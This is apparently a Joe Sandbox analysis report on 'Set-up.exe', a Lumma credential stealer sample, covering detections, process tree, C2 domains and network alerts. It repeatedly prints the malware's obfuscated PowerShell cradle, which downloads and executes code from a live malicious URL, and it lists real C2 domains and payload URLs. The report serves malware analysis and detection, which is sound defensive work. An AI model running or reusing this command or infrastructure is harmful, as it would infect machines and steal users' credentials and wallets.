Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1584522
MD5:956e50e278acbf39dfca43e8ba78f112
SHA1:50d818804b27bfa3ad79a469f0f93d08e3d09b9c
SHA256:caa52bf06d55953df9dba864dcc718170f4598e217e6f949c909d59b19d74a02
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 956E50E278ACBF39DFCA43E8BA78F112)
    • powershell.exe (PID: 6736 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PU6S498VOPMOZVY2Y7.exe (PID: 2000 cmdline: "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • PU6S498VOPMOZVY2Y7.tmp (PID: 4820 cmdline: "C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$2042C,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • PU6S498VOPMOZVY2Y7.exe (PID: 2708 cmdline: "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • PU6S498VOPMOZVY2Y7.tmp (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$60272,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 5740 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5236 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6180 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6188 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6400 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5928 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 2640 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 4544 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2124 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3492 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3520 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2000 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5076 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3848 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 1440 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 428 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5368 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 3588 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 944 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 5796 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cloudewahsj.shop", "abruptyopsn.shop", "nearycrepso.shop", "framekgirus.shop", "noisycuttej.shop", "cellardesiresso.sbs", "wholersorie.shop", "rabidcowse.shop", "tirepublicerj.shop"], "Build id": "Ed5Bn--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x53f45:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Set-up.exe PID: 3492JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Set-up.exe PID: 3492JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Set-up.exe PID: 3492JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 3492, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, ProcessId: 6736, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 3492, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, ProcessId: 6736, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 3492, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, ProcessId: 6736, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 3492, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, ProcessId: 6736, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 3492, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, ProcessId: 6736, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 3492, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a, ProcessId: 6736, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:16.329003+010020283713Unknown Traffic192.168.2.449748104.21.87.8443TCP
              2025-01-05T18:53:17.374948+010020283713Unknown Traffic192.168.2.449749104.21.87.8443TCP
              2025-01-05T18:53:18.515960+010020283713Unknown Traffic192.168.2.449750104.21.87.8443TCP
              2025-01-05T18:53:20.066657+010020283713Unknown Traffic192.168.2.449751104.21.87.8443TCP
              2025-01-05T18:53:21.303531+010020283713Unknown Traffic192.168.2.449752104.21.87.8443TCP
              2025-01-05T18:53:23.459991+010020283713Unknown Traffic192.168.2.449753104.21.87.8443TCP
              2025-01-05T18:53:24.497114+010020283713Unknown Traffic192.168.2.449755104.21.87.8443TCP
              2025-01-05T18:53:25.568733+010020283713Unknown Traffic192.168.2.449756104.21.87.8443TCP
              2025-01-05T18:53:26.900823+010020283713Unknown Traffic192.168.2.449757185.161.251.21443TCP
              2025-01-05T18:53:27.654581+010020283713Unknown Traffic192.168.2.449758172.67.208.58443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:16.883420+010020546531A Network Trojan was detected192.168.2.449748104.21.87.8443TCP
              2025-01-05T18:53:17.922014+010020546531A Network Trojan was detected192.168.2.449749104.21.87.8443TCP
              2025-01-05T18:53:26.151646+010020546531A Network Trojan was detected192.168.2.449756104.21.87.8443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:16.883420+010020498361A Network Trojan was detected192.168.2.449748104.21.87.8443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:17.922014+010020498121A Network Trojan was detected192.168.2.449749104.21.87.8443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:28.054025+010020084381A Network Trojan was detected172.67.208.58443192.168.2.449758TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:25.062321+010020480941Malware Command and Control Activity Detected192.168.2.449755104.21.87.8443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://cegu.shop/8574262446/ph.txtsAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txts;Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txt8Avira URL Cloud: Label: malware
              Source: https://dfgh.online/invoker.php?compName=hZAvira URL Cloud: Label: malware
              Found malware configuration
              Source: Set-up.exe.3492.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "abruptyopsn.shop", "nearycrepso.shop", "framekgirus.shop", "noisycuttej.shop", "cellardesiresso.sbs", "wholersorie.shop", "rabidcowse.shop", "tirepublicerj.shop"], "Build id": "Ed5Bn--"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeReversingLabs: Detection: 73%
              Multi AV Scanner detection for submitted file
              Source: Set-up.exeReversingLabs: Detection: 18%
              Source: Set-up.exeVirustotal: Detection: 17%Perma Link
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: cellardesiresso.sbs
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--JENYA
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49756 version: TLS 1.2
